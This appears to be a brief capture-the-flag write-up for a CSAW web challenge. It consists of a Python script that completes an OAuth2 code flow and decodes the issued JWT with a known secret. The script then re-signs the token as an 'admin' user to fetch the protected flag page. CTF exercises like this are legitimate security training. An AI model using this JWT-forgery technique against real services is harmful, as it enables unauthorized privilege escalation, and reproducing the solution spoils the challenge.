Running thing Code will get you flag

```
import requests
import jwt

#Authorization Request
code = requests.post("http://web.chal.csaw.io:9000/oauth2/authorize", headers={"Content-Type": "application/json"}, json={"response_type":"code","redirect_uri":"http://web.chal.csaw.io:9000/protected"}, allow_redirects=False).text

code = code.split("protected?code=")[1].split("&")[0]

#Access Token Request
r = requests.post("http://web.chal.csaw.io:9000/oauth2/token", json={"grant_type":"authorization_code","code": code,"redirect_uri":"http://web.chal.csaw.io:9000/protected"}).text

token = r.split('"')[7]

#Modifing Token as admin
res= jwt.decode(token, 'ufoundme!', algorithms=['HS256'])

token = jwt.encode({'type': 'admin', 'secret': 'ufoundme!', 'iat': res['iat'], 'exp': res['exp']}, 'ufoundme!', algorithm='HS256')

#Final Request
req = requests.get("http://web.chal.csaw.io:9000/protected", headers={"Authorization": "Bearer " + token}).text
print(req)

```